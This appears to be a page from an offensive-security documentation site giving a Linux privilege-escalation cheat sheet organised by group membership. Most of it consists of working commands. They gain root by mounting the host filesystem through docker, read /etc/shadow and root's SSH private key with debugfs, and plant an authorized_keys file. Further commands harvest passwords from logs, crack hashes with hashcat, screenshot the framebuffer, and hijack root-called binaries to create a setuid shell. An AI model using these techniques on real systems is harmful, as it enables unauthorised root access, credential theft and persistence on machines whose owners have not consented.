Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Check Groups
id
groups
cat /etc/group | grep $(whoami)
docker Group
Full root access via host filesystem mount.
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
lxd Group
Import image, mount host filesystem, root.
See dedicated Docker / LXD Escape page.
disk Group
Direct read/write access to block devices. Bypass all filesystem permissions.
Read /etc/shadow
df -h
# Find root partition, e.g., /dev/sda1
debugfs /dev/sda1
debugfs: cat /etc/shadow
Read SSH Keys
debugfs /dev/sda1
debugfs: cat /root/.ssh/id_rsa
Write Files
debugfs -w /dev/sda1
debugfs: write /tmp/authorized_keys /root/.ssh/authorized_keys
adm Group
Read log files. Harvest credentials from logs.
find /var/log -readable 2>/dev/null
Search Logs for Passwords
grep -ri "password\|pass\|pwd" /var/log/ 2>/dev/null
grep -ri "Failed password\|Accepted password" /var/log/auth.log 2>/dev/null
Auth Log — Usernames as Passwords
Users sometimes type password in username field:
grep "Invalid user" /var/log/auth.log | awk '{print $8}' | sort -u
Audit Logs
aureport --tty 2>/dev/null
cat /var/log/audit/audit.log | grep -i "passwd\|password" 2>/dev/null
video Group
Access framebuffer — screenshot what’s on screen.
cat /dev/fb0 > /tmp/screenshot.raw
cat /sys/class/graphics/fb0/virtual_size
# e.g., 1920,1080
ffmpeg -f rawvideo -pix_fmt bgra -s 1920x1080 -i screenshot.raw screenshot.png
shadow Group
Direct read access to /etc/shadow.
Crack hashes:
hashcat -m 1800 shadow.hash /usr/share/wordlists/rockyou.txt
staff Group
Write to /usr/local/ without root. Hijack binaries.
If a root cron or service calls a binary from /usr/local/bin/:
echo '#!/bin/bash' > /usr/local/bin/target-binary
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /usr/local/bin/target-binary
chmod +x /usr/local/bin/target-binary
sudo Group
User can run any command via sudo (needs password).
If password unknown — check sudo token reuse or other techniques.
root Group
Not same as root user, but may have read access to root-owned files:
find / -group root -writable 2>/dev/null | grep -v proc
Quick Reference
| Group | Impact | Technique |
|---|
docker | Root | Mount host filesystem |
lxd | Root | Privileged container |
disk | Root | debugfs on block device |
adm | Creds | Read log files |
video | Info | Screenshot framebuffer |
shadow | Creds | Read /etc/shadow |
staff | Root | Write to /usr/local/ |
sudo | Root | sudo (needs password) |